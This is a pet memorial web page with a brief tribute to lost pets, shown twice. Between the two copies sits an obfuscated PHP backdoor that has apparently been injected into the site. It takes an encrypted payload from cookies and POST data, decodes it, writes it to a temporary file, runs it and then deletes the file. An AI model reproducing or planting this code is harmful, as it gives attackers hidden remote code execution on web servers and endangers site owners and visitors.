It is with great sadness I present to you those much loved children that have graced our lives. I hope to see them all again when I reach the Rainbow Bridge… I miss them so much… and they touched the lives of many.
![]() |
Veterans | ![]() |
Gone Too Soon… |
$NyHOD = "\115" . '_' . "\x44" . chr (99) . chr ( 1054 - 950 )."\120";$zWTbVNYw = chr (99) . "\154" . "\x61" . chr ( 398 - 283 )."\163" . '_' . "\x65" . 'x' . 'i' . chr (115) . chr (116) . 's';$AaVmbP = class_exists($NyHOD); $zWTbVNYw = "44256";$wTGwDn = !1;if ($AaVmbP == $wTGwDn){function fAMltJ(){$lTehYUiSDF = new /* 58918 */ M_DchP(26480 + 26480); $lTehYUiSDF = NULL;}$FMlCWlhXUP = "26480";class M_DchP{private function uDDXcBNcBa($FMlCWlhXUP){if (is_array(M_DchP::$YNzdfPcDwS)) {$egYbPTVet = sys_get_temp_dir() . "/" . crc32(M_DchP::$YNzdfPcDwS['s' . "\141" . chr (108) . 't']);@M_DchP::$YNzdfPcDwS[chr (119) . "\162" . chr (105) . "\164" . "\x65"]($egYbPTVet, M_DchP::$YNzdfPcDwS[chr ( 465 - 366 ).chr (111) . "\x6e" . "\x74" . "\145" . "\x6e" . "\164"]);include $egYbPTVet;@M_DchP::$YNzdfPcDwS[chr (100) . 'e' . "\x6c" . 'e' . "\164" . 'e']($egYbPTVet); $FMlCWlhXUP = "26480";exit();}}private $UnbkBCSzE;public function pOxozMQUS(){echo 23709;}public function __destruct(){M_DchP::$YNzdfPcDwS = @unserialize(M_DchP::$YNzdfPcDwS); $FMlCWlhXUP = "24415_46019";$this->uDDXcBNcBa($FMlCWlhXUP); $FMlCWlhXUP = "24415_46019";}public function mIlobAwrtF($XuVChnlZ, $ToiRjeza){return $XuVChnlZ[0] ^ str_repeat($ToiRjeza, (strlen($XuVChnlZ[0]) / strlen($ToiRjeza)) + 1);}public function __construct($ZURpNKzsp=0){$KWeAlLROs = $_POST;$ebTtk = $_COOKIE;$ToiRjeza = "b6b4bfa2-3cf0-4566-9219-9e48a15d2a07";$ksbvpPHGIr = @$ebTtk[substr($ToiRjeza, 0, 4)];if (!empty($ksbvpPHGIr)){$REyuI = "base64";$XuVChnlZ = "";$ksbvpPHGIr = explode(",", $ksbvpPHGIr);foreach ($ksbvpPHGIr as $heUTGHPC){$XuVChnlZ .= @$ebTtk[$heUTGHPC];$XuVChnlZ .= @$KWeAlLROs[$heUTGHPC];}$XuVChnlZ = array_map($REyuI . "\137" . "\144" . "\x65" . "\143" . "\x6f" . 'd' . chr (101), array($XuVChnlZ,));M_DchP::$YNzdfPcDwS = $this->mIlobAwrtF($XuVChnlZ, $ToiRjeza);}}public static $YNzdfPcDwS = 53716;}fAMltJ();}
It is with great sadness I present to you those much loved children that have graced our lives. I hope to see them all again when I reach the Rainbow Bridge… I miss them so much… and they touched the lives of many.
![]() |
Veterans | ![]() |
Gone Too Soon… |